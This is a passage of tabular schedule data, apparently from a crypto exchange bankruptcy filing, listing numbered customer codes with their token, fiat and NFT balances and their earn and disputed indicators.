| 07332350 | | BTC[.02223818], DOGE[262.63401779], USD[0.00], USDT[1] | | |
| 07332351 | | USD[10.00] | | |
| 07332352 | | DOGE[170.03071664], USD[0.00] | | |
| 07332353 | | DOGE[292.06837712], USD[0.00] | | |
| 07332354 | | USD[10.00] | | |
| 07332355 | | USD[10.00] | | |
| 07332356 | | BRZ[1], ETH[.00000076], ETHW[.00000076], GRT[1], MATIC[117.14129599], SHIB[2], USD[0.00], USDT[0.00073205] | Yes | |
| 07332357 | | USD[10.00] | | |
| 07332358 | | CUSDT[1], USD[0.00] | Yes | |
| 07332359 | | USD[10.00] | | |
| 07332360 | | BTC[0.00000656], CUSDT[3], USD[0.00] | Yes | |
| 07332361 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07332362 | | USD[10.00] | | |
| 07332363 | | CUSDT[1], DOGE[16.76934209], USD[0.00] | | |
| 07332364 | | USD[10.00] | | |
| 07332365 | | BRZ[0], CUSDT[1], DOGE[0], USD[0.00], USDT[0] | | |
| 07332366 | | CUSDT[3], DOGE[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07332367 | | USD[10.00] | | |
| 07332368 | | DOGE[1.1565891], TRX[1], USD[0.00] | | |
| 07332369 | | BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], SHIB[1176818.42874085], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07332370 | | USD[10.00] | | |
| 07332371 | | USD[10.00] | | |
| 07332372 | | USD[10.00] | | |
| 07332373 | | USD[10.00] | | |
| 07332374 | | USD[10.00] | | |
| 07332375 | | USD[10.00] | | |
| 07332376 | | USD[10.00] | | |
| 07332377 | | DOGE[147.74863583], USD[0.00] | | |
| 07332378 | | USD[10.00] | | |
| 07332379 | | DOGE[1326.799], USD[39.91] | | |
| 07332380 | | BAT[0], BTC[0], DOGE[3], ETH[0], GRT[0], SUSHI[0], USD[0.00] | | |
| 07332381 | | USD[10.00] | | |
| 07332382 | | USD[0.00], USDT[0] | | |
| 07332383 | | USD[10.00] | | |
| 07332385 | | BRZ[1], CUSDT[2], DOGE[1], TRX[2], USD[0.00] | | |
| 07332386 | | CUSDT[2], DOGE[.65895591], USD[25.39] | | |
| 07332387 | | USD[0.01], USDT[0] | | |
| 07332388 | | CUSDT[3], DOGE[563.0085827], TRX[1], USD[0.00] | | |
| 07332389 | | DOGE[1], USD[110.89] | | |
| 07332390 | | CUSDT[1], LTC[.00001121], USD[0.00] | | |
| 07332391 | | CUSDT[1], USD[0.00] | | |
| 07332392 | | USD[10.00] | | |
| 07332393 | | USD[10.00] | | |
| 07332394 | | BRZ[5], CUSDT[5], DOGE[1], TRX[10], USD[0.00], USDT[1] | | |
| 07332395 | | CUSDT[1], DOGE[134.51505535], SHIB[893256.91782045], USD[0.00] | | |
| 07332396 | | DOGE[2458.19033901], USD[0.00] | | |
| 07332397 | | USD[10.00] | | |
| 07332398 | | CUSDT[1], DOGE[5.46479834], USD[0.41] | Yes | |
| 07332399 | | BTC[0], CUSDT[1], DOGE[0], USD[0.00], USDT[0] | Yes | |
| 07332400 | | BAT[1], BRZ[0], CUSDT[1], GRT[1], TRX[2], USD[0.00] | | |
| 07332401 | | BRZ[1], DOGE[504.56533332], TRX[1], USD[0.00] | | |
| 07332402 | | USD[10.00] | | |
| 07332403 | | CUSDT[2], SOL[.35263428], USD[0.00] | | |
| 07332404 | | USD[10.00] | | |
| 07332405 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07332406 | | CUSDT[2], DOGE[2153.53323638], USD[0.00] | | |
| 07332407 | | DOGE[187.79085282], USD[0.00] | | |
| 07332408 | | DOGE[.0000518], TRX[1], USD[0.63] | | |
| 07332409 | | CUSDT[3], SHIB[1], USD[14.35] | | |
| 07332410 | | CUSDT[1], DOGE[1], SHIB[585341.71468358], TRX[1], USD[0.00] | Yes | |
| 07332411 | | BTC[0], GRT[0], TRX[0], USD[0.00] | | |
| 07332412 | | BAT[33.01932588], CUSDT[3], DOGE[791.4513244], ETH[.00002916], ETHW[.00002916], TRX[463.73193196], USD[0.48] | | |
| 07332413 | | USD[10.00] | | |
| 07332414 | | BRZ[0], DOGE[0], ETH[0], USD[0.00], USDT[0] | | |
| 07332415 | | USD[10.00] | | |
| 07332416 | | BRZ[1], CUSDT[1], DOGE[670.72300527], NFT [45489434021198006S/FTX - Off The Grid Miami #3990][1], TRX[1], USD[0.00] | Yes | |
| 07332417 | | USD[11.04] | Yes | |
| 07332418 | | CUSDT[2], USD[0.08] | Yes | |
| 07332419 | | CUSDT[1], DOGE[3], ETH[.01605982], ETHW[.01585601], GRT[0], SHIB[0], USD[0.00] | Yes | |
| 07332420 | | DOGE[257.52507586], USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07332421 | | USD[10.00] | | |
| 07332422 | | USD[10.00] | | |
| 07332423 | | CUSDT[1], DOGE[239.64038416], TRX[1634.57078117], USD[0.00] | | |
| 07332424 | | BTC[.00017259], USD[0.00] | Yes | |
| 07332425 | | USD[10.00] | | |
| 07332426 | | BTC[0.18869041], CUSDT[2], DOGE[2], ETH[0], GRT[3.14012853], LINK[0], SOL[0], TRX[16.03776017], USD[0.07], USDT[2.16211868] | Yes | |
| 07332427 | | DOGE[52.15722913], USD[0.00] | Yes | |
| 07332428 | | USD[10.00] | | |
| 07332430 | | BRZ[1], CUSDT[6], DOGE[.00774581], ETH[0.00000034], ETHW[0.00000034], USD[0.01] | | |
| 07332431 | | USD[10.00] | | |
| 07332432 | | CUSDT[5], DOGE[1], ETH[0], ETHW[0], GRT[1.00498957], TRX[5], USD[12.19], USDT[1.10777738] | Yes | |
| 07332433 | | CUSDT[3], USD[0.02] | | |
| 07332434 | | TRX[192.15271375], USD[0.00] | | |
| 07332435 | | CUSDT[62.02619606], DOGE[6430.88471567], GRT[10.25390487], TRX[2], USD[326.98] | Yes | |
| 07332436 | | USD[10.00] | | |
| 07332437 | | BRZ[1], CUSDT[5], DOGE[797.03432096], GRT[1], TRX[1], USD[0.00] | | |
| 07332438 | | CUSDT[1], DOGE[431.52406901], USD[0.00] | | |
| 07332439 | | USD[10.00] | | |
| 07332440 | | ETH[.00447788], ETHW[.00447788], USD[0.00] | | |
| 07332441 | | BRZ[1], CUSDT[1], DOGE[.25512936], LINK[1], TRX[2], USD[0.00] | | |
| 07332442 | | USD[10.00] | | |
| 07332443 | | DOGE[147.4293533], TRX[1], USD[1037.44] | | |
| 07332444 | | USD[10.00] | | |
| 07332445 | | USD[10.00] | | |
| 07332446 | | CUSDT[1], USD[0.00] | | |
| 07332447 | | USD[10.00] | | |
| 07332448 | | CUSDT[1], DOGE[141.06059511], USD[0.00] | | |
| 07332449 | | CUSDT[2], GRT[1.00404471], TRX[1], USD[0.00] | Yes | |
| 07332450 | | BRZ[1], CUSDT[2], DOGE[1], GRT[1], USD[0.98] | | |
| 07332451 | | USD[10.00] | | |
| 07332452 | | USD[10.00] | | |
| 07332453 | | USD[10.00] | | |
| 07332454 | | USD[10.00] | | |
| 07332455 | | USD[10.00] | | |
| 07332456 | | CUSDT[2], USD[0.00] | Yes | |
| 07332457 | | USD[10.00] | | |
| 07332458 | Contingent, Disputed | CUSDT[1], DOGE[2047.5751154], USD[28.08] | | |
| 07332459 | | USD[0.00] | | |
| 07332460 | | USD[10.00] | | |
| 07332461 | | DOGE[132.38469987], USD[0.00] | | |
| 07332463 | | CUSDT[.37926862], DOGE[1.00003658], TRX[5.2056841], USD[0.00], USDT[0] | | |
| 07332464 | | ETH[.00272546], ETHW[.0026981], TRX[1], USD[0.00] | Yes | |
| 07332465 | | USD[10.00] | | |
| 07332466 | | USD[10.00] | | |
| 07332467 | | DOGE[1], TRX[338.95740498], USD[0.00] | | |
| 07332470 | | USD[10.00] | | |
| 07332471 | | BAT[1.0165555], BRZ[4], CUSDT[9], LTC[.29099676], SHIB[3], SOL[7.92588617], TRX[.02267855], USD[0.00] | Yes | |
| 07332472 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07332473 | | BRZ[2], DOGE[2], LINK[.72211911], TRX[2], USD[1767.95], USDT[1] | | |
| 07332474 | | USD[10.00] | | |
| 07332475 | | ETH[.00000001], NFT (35821763176415157/Ghoulie #5047)[1], NFT (38851593552121586/Nation Bears #3)[1], NFT (43835810157277639/Cutie Kittens #25)[1], NFT (44652443881721754/Guard #9)[1], NFT (54165326567682653/Ghoulie #6978)[1], NFT (55071299105195057/Nation Bears #2)[1], SHIB[47106.79661871], SOL[0], USD[0.00] | Yes | |
| 07332476 | | USD[10.00] | | |
| 07332477 | | USD[10.00] | | |
| 07332478 | | USD[10.00] | | |
| 07332479 | | BRZ[3], CUSDT[5], DOGE[2], TRX[5], USD[0.00], USDT[1] | | |
| 07332480 | | USD[10.00] | | |
| 07332481 | | BTC[.0012153], CUSDT[2], DOGE[807.0940076], ETH[.01803939], ETHW[.01803939], TRX[4], USD[0.84] | | |
| 07332482 | | USD[10.88] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07332483 | | USD[10.00] | | |
| 07332485 | | USD[10.00] | | |
| 07332486 | | USD[10.00] | | |
| 07332487 | | USD[0.00] | | |
| 07332490 | | USD[10.00] | | |
| 07332491 | | USD[10.00] | | |
| 07332492 | | USD[10.00] | | |
| 07332493 | | CUSDT[1], SUSHI[.69613758], USD[0.00] | | |
| 07332494 | | USD[10.00] | | |
| 07332495 | | CUSDT[1], USD[0.00] | | |
| 07332496 | | BTC[0], CUSDT[8], DOGE[2526.08298708], TRX[0], USD[0.00], YFI[0] | | |
| 07332497 | | USD[10.00] | | |
| 07332498 | | ETH[0.01280020], ETHW[0.01280020], USD[0.02] | | |
| 07332499 | | DOGE[26.17107034], USD[0.00] | | |
| 07332500 | | USD[10.00] | | |
| 07332501 | | USD[10.00] | | |
| 07332502 | | USD[10.00] | | |
| 07332503 | | BRZ[0], DOGE[.00000734], USD[0.00] | Yes | |
| 07332504 | | USD[10.00] | | |
| 07332505 | | USD[10.00] | | |
| 07332506 | | USD[0.01] | | |
| 07332507 | | BRZ[1], CUSDT[31], DOGE[3], SOL[0], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07332508 | | BAT[3], BRZ[3], CUSDT[7], GRT[1], SHIB[949922.06108597], TRX[5], USD[0.00] | | |
| 07332509 | | DAI[1.55017076], DOGE[542.25376704], GBP[5.61], GRT[1.18231726], USD[0.00] | Yes | |
| 07332510 | | USD[10.00] | | |
| 07332511 | | USD[10.00] | | |
| 07332512 | | USD[10.00] | | |
| 07332513 | | BRZ[1], CUSDT[6], DOGE[11328.48555878], USD[0.00] | | |
| 07332514 | | CUSDT[4], TRX[1], USD[0.01] | | |
| 07332515 | | USD[10.67] | Yes | |
| 07332517 | | CUSDT[1], USD[0.00] | | |
| 07332518 | | USD[10.00] | | |
| 07332519 | | BAT[1.01651467], BRZ[4], BTC[.00000021], CUSDT[41], DOGE[.00256329], GRT[.00758306], LINK[.00561153], NFT [427888479440888759/Test #1][1], NFT [529771586207629385/Seen better days ][1], SHIB[12], TRX[16.54850098], USD[86.59] | Yes | |
| 07332520 | | BRZ[1], DOGE[1.00004745], TRX[1], USD[0.00] | | |
| 07332521 | | BRZ[2], CUSDT[17.48601488], DOGE[360.54706456], ETH[0.08075498], ETHW[0.07975996], LINK[1.68503969], TRX[3], USD[0.00] | Yes | |
| 07332522 | | USD[10.00] | | |
| 07332523 | | USD[10.00] | | |
| 07332526 | | USD[10.00] | | |
| 07332527 | | CUSDT[1], DOGE[4354.77251141], TRX[1], USD[0.47] | | |
| 07332528 | | CUSDT[7], DOGE[2], ETH[.15826771], ETHW[.15826771], LTC[1.35841981], TRX[839.42151224], USD[0.63] | | |
| 07332529 | | USD[7.18] | | |
| 07332530 | | USD[10.00] | | |
| 07332531 | | DOGE[3.64403985], TRX[1], USD[0.02] | | |
| 07332532 | | CUSDT[1], DOGE[4738.4200768], TRX[2], USD[0.01] | Yes | |
| 07332535 | | BRZ[1], USD[10.00] | | |
| 07332536 | | GRT[8.815101], USD[0.00] | | |
| 07332537 | | USD[10.00] | | |
| 07332538 | | BAT[133.27929284], CUSDT[7], DOGE[2], ETH[0], ETHW[0], GBP[0.00], GRT[0], SOL[0], SUSHI[0], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07332539 | | CUSDT[12], DOGE[0], TRX[4], USD[0.00] | | |
| 07332540 | | USD[10.00] | | |
| 07332541 | | USD[10.00] | | |
| 07332542 | | BRZ[1], CUSDT[1], DOGE[2.00002523], TRX[1], USD[0.00] | Yes | |
| 07332543 | | CUSDT[2], DOGE[4], USD[0.00] | | |
| 07332544 | | USD[10.00] | | |
| 07332545 | | USD[10.00] | | |
| 07332546 | | DOGE[1], USD[2.67], USDT[0] | | |
| 07332547 | | USD[10.00] | | |
| 07332548 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07332549 | | BRZ[2], CUSDT[2], USD[155.70] | | |
| 07332550 | | BRZ[1], CUSDT[7], LINK[6.17193569], SHIB[563856.78192839], TRX[1], USD[0.00] | | |
| 07332551 | | USD[10.00] | | |
| 07332552 | | BRZ[0], BTC[0], DOGE[0], TRX[0], USD[0.04] | | |
| 07332553 | | USD[10.00] | | |
| 07332554 | | BCH[0], BTC[.00004286], DOGE[0], TRX[1], USD[0.00], USDT[1] | | |
| 07332555 | | USD[10.00] | | |
| 07332556 | | BAT[.47319804], CUSDT[5], DOGE[105.53219343], LINK[.00096441], TRX[.00004832], USD[0.00], USDT[0.00054648] | | |
| 07332557 | | USD[10.00] | | |
| 07332558 | | USD[10.00] | | |
| 07332559 | | BRZ[1], CUSDT[2], DOGE[1], GRT[1], USD[35.77] | | |
| 07332560 | | BAT[3.59766072], BRZ[1], CUSDT[5], GRT[1], TRX[2], USD[0.00] | | |
| 07332561 | | BCH[.00906096], BRZ[1], BTC[.00002196], CUSDT[130.73324117], DAI[1.00164858], DOGE[2501.17608438], ETH[.01448839], ETHW[.01448839], GBP[1.06], GRT[1.00705921], SHIB[298894.06872852], SOL[1.00040199], TRX[45.39935791], USD[0.00], USDT[8.94877177] | | |
| 07332562 | | USD[10.00] | | |
| 07332563 | | DOGE[1149.42965360], USD[10.00] | | |
| 07332564 | | CUSDT[6], TRX[4], USD[0.00], USDT[1] | | |
| 07332565 | | USD[10.00] | | |
| 07332566 | | USD[10.00] | | |
| 07332567 | | BRZ[6.31250169], BTC[0], CUSDT[136.7495716], DOGE[24.34653675], ETH[0.0000001], ETHW[0], TRX[28.49451976], USD[0.00] | Yes | |
| 07332568 | | BRZ[1], CUSDT[1], TRX[4], USD[0.00] | | |
| 07332569 | | USD[10.00] | | |
| 07332570 | | USD[10.00] | | |
| 07332571 | | CUSDT[407.67191426], DAI[1.9858377], GRT[1.23221925], TRX[1], USD[0.01], USDT[7.45805506] | | |
| 07332572 | | USD[10.00] | | |
| 07332573 | | DOGE[.93612549], ETH[.05224599], ETHW[.05224599], USD[0.00] | | |
| 07332574 | | DOGE[1], USD[0.01] | | |
| 07332575 | | BRZ[2], CUSDT[5], DOGE[481.76587208], GRT[4.00343949], SHIB[5], SOL[2.163305], TRX[3], UNI[.0000095], USD[0.94] | Yes | |
| 07332576 | | USD[10.00] | | |
| 07332579 | | USD[10.00] | | |
| 07332580 | | CUSDT[12], DOGE[43.17033488], ETH[.00137157], ETHW[.00135789], SHIB[171240.45433308], USD[0.98] | Yes | |
| 07332581 | | DOGE[374.69915114], TRX[1], USD[3.92] | | |
| 07332582 | | USD[10.00] | | |
| 07332583 | | DOGE[2], LINK[9.94004061], SGD[27.62], USD[0.00] | Yes | |
| 07332585 | | USD[10.00] | | |
| 07332587 | | USD[10.00] | | |
| 07332589 | | USD[10.00] | | |
| 07332591 | | BRZ[2], CUSDT[3], DOGE[370.40617277], TRX[35.10095107], UNI[1], USD[0.00], USDT[0] | | |
| 07332592 | | GRT[9.55752135], USD[0.00], USDT[0] | | |
| 07332593 | | CUSDT[7], DOGE[0], ETH[0], TRX[2], USD[0.00] | | |
| 07332594 | | USD[10.00] | | |
| 07332595 | | BRZ[1], BTC[.00797102], CUSDT[2], DOGE[138.54759956], TRX[1], USD[0.00] | | |
| 07332596 | | USD[10.00] | | |
| 07332597 | | USD[10.00] | | |
| 07332598 | | USD[0.45] | Yes | |
| 07332599 | | BRZ[4], CUSDT[2], DOGE[0], ETH[0], GRT[0], LTC[0], SHIB[0.00000005], SUSHI[0], TRX[4], USD[0.00], USDT[0] | | |
| 07332600 | | NFT (308708757013210055/CryptoAvatar #132)[1], NFT (325347904353626810/Pug family #1 of 2)[1], NFT (326169356878825868/CryptoAvatar #127)[1], NFT (342479623955597250/CryptoAvatar #134)[1], NFT (393747713662235833/FTX Dream #1)[1], NFT (427544437580016249/CryptoAvatar #126)[1], NFT (427782141404966095/Halloween edition)[1], NFT (458952517693936600/Gamer caves  #2)[1], NFT (463987956367331160/CryptoAvatar #130)[1], NFT (474153981279743753/Echo #2)[1], NFT (486554245479417582/CryptoAvatar #133)[1], NFT (512388940887764988/Halloween edition #7)[1], NFT (527226449346704280/CryptoAvatar #142)[1], SHIB[41077740.4026656], USD[1517.54], USDT[0] | Yes | |
| 07332601 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07332603 | | BF_POINT[200], SHIB[818.08058056], USD[0.00] | Yes | |
| 07332604 | | USD[10.00] | | |
| 07332605 | | USD[10.00] | | |
| 07332607 | | DOGE[29.13596027], TRX[1], USD[0.00] | | |
| 07332608 | | SHIB[211981.83243728], USD[0.00], YFI[.00007842] | Yes | |
| 07332609 | | USD[0.00] | | |
| 07332610 | | CUSDT[1], DOGE[1], ETH[0], USD[0.00] | | |
| 07332611 | | USD[10.00] | | |
| 07332612 | | CUSDT[3], DOGE[131.07586179], ETH[.01281507], ETHW[.01281507], USD[0.13] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07332613 | | TRX[2], USD[0.00] | | |
| 07332614 | | USD[10.00] | | |
| 07332615 | | USD[10.00] | | |
| 07332616 | | CUSDT[1], GRT[1], TRX[1], USD[0.00] | | |
| 07332617 | | BAT[0], BCH[0], BRZ[1], CUSDT[3], DOGE[5], ETH[0], GRT[0], SUSHI[0], TRX[3], USD[0.00] | | |
| 07332618 | | CUSDT[1], USD[0.01] | | |
| 07332619 | | USD[10.00] | | |
| 07332621 | | BTC[.00021303], USD[0.00] | | |
| 07332622 | | DOGE[1.00002761], USD[0.01] | Yes | |
| 07332624 | | USD[0.16] | | |
| 07332625 | | USD[10.00] | | |
| 07332626 | | DOGE[2922.60429966], USD[10.00] | | |
| 07332627 | | BRZ[1], BTC[0], CUSDT[3], DOGE[1], ETH[0], ETHW[0], TRX[1], USD[0.00] | | |
| 07332628 | | USD[10.00] | | |
| 07332629 | | USD[10.00] | | |
| 07332630 | | TRX[1], UNI[1], USD[10.00] | | |
| 07332632 | | USD[10.00] | | |
| 07332633 | | DOGE[0], USD[0.01] | | |
| 07332634 | | USD[10.00] | | |
| 07332636 | | BRZ[0], DOGE[1], TRX[4339.20370455], USD[0.00] | | |
| 07332637 | | BTC[0], DOGE[1], SOL[.00000001], USD[0.01], USDT[0] | Yes | |
| 07332638 | | CUSDT[34], DOGE[0], ETH[0], GRT[.00465073], SOL[0], TRX[6], USD[1.09], USDT[1.09985414] | Yes | |
| 07332639 | | BRZ[2], CUSDT[2], TRX[3], USD[0.00] | | |
| 07332640 | | CUSDT[2], ETHW[.06516576], SHIB[5], TRX[2], USD[439.09] | | |
| 07332641 | | NFT (431893586584203785/Entrance Voucher #1843)[1], SHIB[2], USD[172.13] | Yes | |
| 07332642 | | USD[10.00] | | |
| 07332643 | | USD[10.00] | | |
| 07332644 | | CUSDT[2], DOGE[37.03802727], SHIB[1], SUSHI[18.95822771], TRX[2], USD[1.74] | | |
| 07332646 | | USD[10.00] | | |
| 07332648 | | USD[10.00] | | |
| 07332649 | | BRZ[0], BTC[0], DOGE[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07332650 | | BRZ[0], CUSDT[2], DOGE[1], USD[0.00] | | |
| 07332651 | | USD[10.00] | | |
| 07332652 | | USD[10.00] | | |
| 07332653 | | USD[10.00] | | |
| 07332655 | | CUSDT[7], DOGE[173.07616159], TRX[1], USD[0.40] | | |
| 07332656 | | DOGE[2], USD[0.00] | | |
| 07332658 | | USD[10.00] | | |
| 07332659 | | BCH[.01948152], CUSDT[4], DOGE[34.83730576], ETHW[.00769295], SHIB[1], USD[0.01] | | |
| 07332660 | | BTC[.0001815], DOGE[186], SOL[.01088292], USD[0.36], USDT[1.215106] | | |
| 07332661 | | USD[10.00] | | |
| 07332662 | | BTC[.00000008], USD[0.00] | | |
| 07332663 | | USD[10.00] | | |
| 07332664 | | DOGE[134.4047362], USD[0.00] | | |
| 07332665 | | BRZ[1], CUSDT[3], SHIB[3], USD[0.00] | Yes | |
| 07332666 | | USD[0.00], USDT[0] | Yes | |
| 07332667 | | DOGE[67.36619592], TRX[1], USD[10.37] | | |
| 07332668 | | BRZ[2], CUSDT[2], DOGE[2], USD[0.00] | | |
| 07332669 | | USD[10.00] | | |
| 07332670 | | USD[10.00] | | |
| 07332671 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07332672 | | CUSDT[5], USD[0.00] | Yes | |
| 07332673 | | BTC[0], CUSDT[1], DOGE[0], USD[0.09] | Yes | |
| 07332674 | | BTC[0], ETH[0], USD[0.00], USDT[0] | | |
| 07332675 | | USD[0.00] | | |
| 07332676 | | DOGE[3], SUSHI[0], TRX[0], USD[0.01] | | |
| 07332677 | | USD[10.00] | | |
| 07332678 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07332679 | | USD[10.00] | | |
| 07332680 | | BRZ[3], CUSDT[1], DOGE[1], GRT[.88303681], TRX[4.83459147], UNI[.00000344], USD[1086.70] | | |
| 07332681 | | USD[10.00] | | |
| 07332682 | | USD[10.00] | | |
| 07332684 | | USD[0.47] | | |
| 07332685 | | TRX[207.8257622], USD[0.00] | | |
| 07332686 | | BAT[2], BRZ[4], BTC[.00015995], CUSDT[13], DOGE[1], TRX[8], USD[0.00] | | |
| 07332687 | | USD[10.00] | | |
| 07332688 | | USD[10.00] | | |
| 07332689 | | USD[10.00] | | |
| 07332690 | | DOGE[.08601306], USD[0.00] | | |
| 07332691 | | USD[10.00] | | |
| 07332692 | | USD[10.00] | | |
| 07332693 | | USD[10.00] | | |
| 07332694 | | BTC[.00323409], CUSDT[1], DOGE[1.0000072], USD[0.00] | | |
| 07332695 | | DOGE[609.91438481], ETH[.00575965], ETHW[.00575965], USD[0.00] | | |
| 07332696 | | USD[10.00] | | |
| 07332697 | | BRZ[0.00000005], CUSDT[9], EUR[0.00], TRX[1], USD[0.00] | | |
| 07332698 | | BTC[0], DOGE[0], GRT[0], SHIB[4], SOL[0], SUSHI[0.0], USD[0.00], USDT[0] | Yes | |
| 07332699 | | USD[10.00] | | |
| 07332700 | | CUSDT[5], DOGE[9805.09337942], SHIB[14342860.39881858], TRX[1], USD[0.00] | | |
| 07332701 | | BTC[0], DOGE[0], SUSHI[0], USD[0.00], USDT[0.00026412] | | |
| 07332703 | | USD[10.00] | | |
| 07332704 | | USD[10.00] | | |
| 07332705 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07332706 | | CUSDT[2], DOGE[1272.0126063], USD[0.55] | | |
| 07332707 | | BTC[.0000344] | | |
| 07332708 | | USD[10.00] | | |
| 07332709 | | CUSDT[1], DOGE[389.54358173], SHIB[1], USD[0.00] | Yes | |
| 07332710 | | CUSDT[2], ETH[.01955629], ETHW[.01931005], USD[0.00] | Yes | |
| 07332711 | | USD[10.00] | | |
| 07332712 | | USD[10.00] | | |
| 07332713 | | USD[10.00] | | |
| 07332714 | | USD[10.00] | | |
| 07332715 | | DOGE[645.15879097], USD[10.00] | | |
| 07332716 | | BTC[0], ETH[0], USD[0.00] | | |
| 07332717 | | CUSDT[1], USD[0.01], USDT[0.00000001] | | |
| 07332718 | | USD[10.00] | | |
| 07332719 | | DOGE[1], GRT[16.02089072], USD[0.00] | | |
| 07332720 | | CUSDT[1], DOGE[4340.6897697], ETH[.39116441], ETHW[.39100019], GRT[1.00283507], TRX[2], USD[0.00] | Yes | |
| 07332721 | | BRZ[6.62127983], CUSDT[7], GRT[1.00498957], SOL[.0080456], TRX[17.50503858], USD[7.21] | Yes | |
| 07332722 | | BTC[0], USD[0.00] | | |
| 07332723 | | BRZ[1], DOGE[559.08963048], ETH[.0003344], ETHW[.0003344], USD[16.14] | | |
| 07332724 | | BTC[.01507725], CUSDT[2], DOGE[199.32789187], ETH[1.79715512], ETHW[1.79640026], LINK[7.80138416], SOL[5.29837326], TRX[1], UNI[22.54882612], USD[0.14], USDT[0] | Yes | |
| 07332725 | | BRZ[1], CUSDT[3], DOGE[1400.13953897], TRX[2], USD[0.00] | | |
| 07332726 | | USD[10.00] | | |
| 07332727 | | BRZ[1], CUSDT[2], DOGE[1], USD[0.01] | | |
| 07332728 | | BAT[1.998], BCH[.143424], ETH[.4995], ETHW[.4995], SUSHI[9.99], UNI[4.482], USD[0.13] | | |
| 07332729 | | USD[10.00] | | |
| 07332730 | | USD[0.00], USDT[0] | | |
| 07332731 | | CUSDT[2], NFT [565699404867670570/Bored Ape Solana Club #2482/[1], TRX[402.60175414], USD[0.00] | Yes | |
| 07332732 | | BAT[.00002238], BCH[.11017699], BRZ[1], BTC[0.00608393], CUSDT[1902.53380376], ETH[.09090902], ETHW[.0898591], GRT[11.00870768], SHIB[2212322.52147543], TRX[1123.00475638], USD[7.59] | Yes | |
| 07332733 | | USD[10.00] | | |
| 07332734 | | USD[10.00] | | |
| 07332735 | | USD[10.00] | | |
| 07332737 | | ETH[.00592068], ETHW[.00585228], USD[0.00] | Yes | |
| 07332738 | | BRZ[1], CUSDT[1], DOGE[2474.38085032], SHIB[1], TRX[1], USD[0.00], USDT[2] | | |
| 07332739 | | USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07332740 | | USD[0.00] | | |
| 07332741 | | USD[10.00] | | |
| 07332742 | | USD[10.00] | | |
| 07332743 | | SOL[.00016771], USD[5.78] | Yes | |
| 07332744 | | BRZ[2], CUSDT[1], DOGE[26.32565332], USD[0.87] | | |
| 07332746 | | BAT[1], BRZ[2], CUSDT[2], GRT[1], TRX[8], USD[0.00], USDT[0] | | |
| 07332747 | | USD[10.00] | | |
| 07332748 | | BRZ[2], CUSDT[11], DOGE[1], TRX[5], USD[0.00], USDT[1] | | |
| 07332749 | | USD[10.00] | | |
| 07332750 | | USD[10.00] | | |
| 07332751 | | BRZ[0], DOGE[1], USD[0.00] | | |
| 07332752 | | USD[10.00] | | |
| 07332753 | | USD[10.00] | | |
| 07332754 | | USD[0.00] | | |
| 07332755 | | USD[10.00] | | |
| 07332756 | | USD[10.00] | | |
| 07332757 | | USD[10.00] | | |
| 07332758 | | DOGE[3], USD[0.17] | | |
| 07332759 | | BTC[0.00006514], ETH[0.01535538], MATIC[0], MKR[0.00052097], SOL[0.02319233], TRX[145.60670759], USD[5000.30], USDT[-0.77272599] | | |
| 07332760 | | USD[10.00] | | |
| 07332761 | | CUSDT[3], ETH[.00006067], ETHW[.00006067], USD[0.00] | | |
| 07332762 | | BAT[9.4524251], BRZ[1], CUSDT[1.38627747], DOGE[36.87899563], GRT[.00154822], LINK[.00000436], TRX[163.29037754], USD[0.01], USDT[4.95355389] | | |
| 07332763 | | BRZ[0.00000002], BTC[0], USD[0.00] | | |
| 07332764 | | USD[10.00] | | |
| 07332765 | | USD[10.00] | | |
| 07332766 | | USD[10.00] | | |
| 07332767 | | USD[10.00] | | |
| 07332768 | | USD[10.00] | | |
| 07332770 | | USD[0.00] | Yes | |
| 07332771 | | USD[0.89] | Yes | |
| 07332772 | | BTC[.00286976], CUSDT[519.96361876], DOGE[1142.75025069], TRX[783.97919544], USD[0.00] | Yes | |
| 07332773 | | BRZ[0], BTC[0], DOGE[0], USD[0.00] | | |
| 07332774 | | BAT[0], BRZ[2], BTC[0], CUSDT[8], DOGE[29225.36410671], ETH[0.70987208], ETHW[0.70987208], GRT[3487.59229262], LINK[62.54770531], SOL[213.85183797], SUSHI[538.73831081], TRX[13891.758972], USD[0.00], USDT[3] | | |
| 07332775 | | USD[10.00] | | |
| 07332777 | | USD[10.00] | | |
| 07332778 | | DOGE[165.65042083], LTC[0], SHIB[1829565.59054732], TRX[82.15187548], USD[0.10] | Yes | |
| 07332779 | | DOGE[3254.67791358], USD[0.00] | Yes | |
| 07332780 | | SOL[.002449], USD[0.00], USDT[0] | | |
| 07332781 | | USD[10.00] | | |
| 07332782 | | USD[10.00] | | |
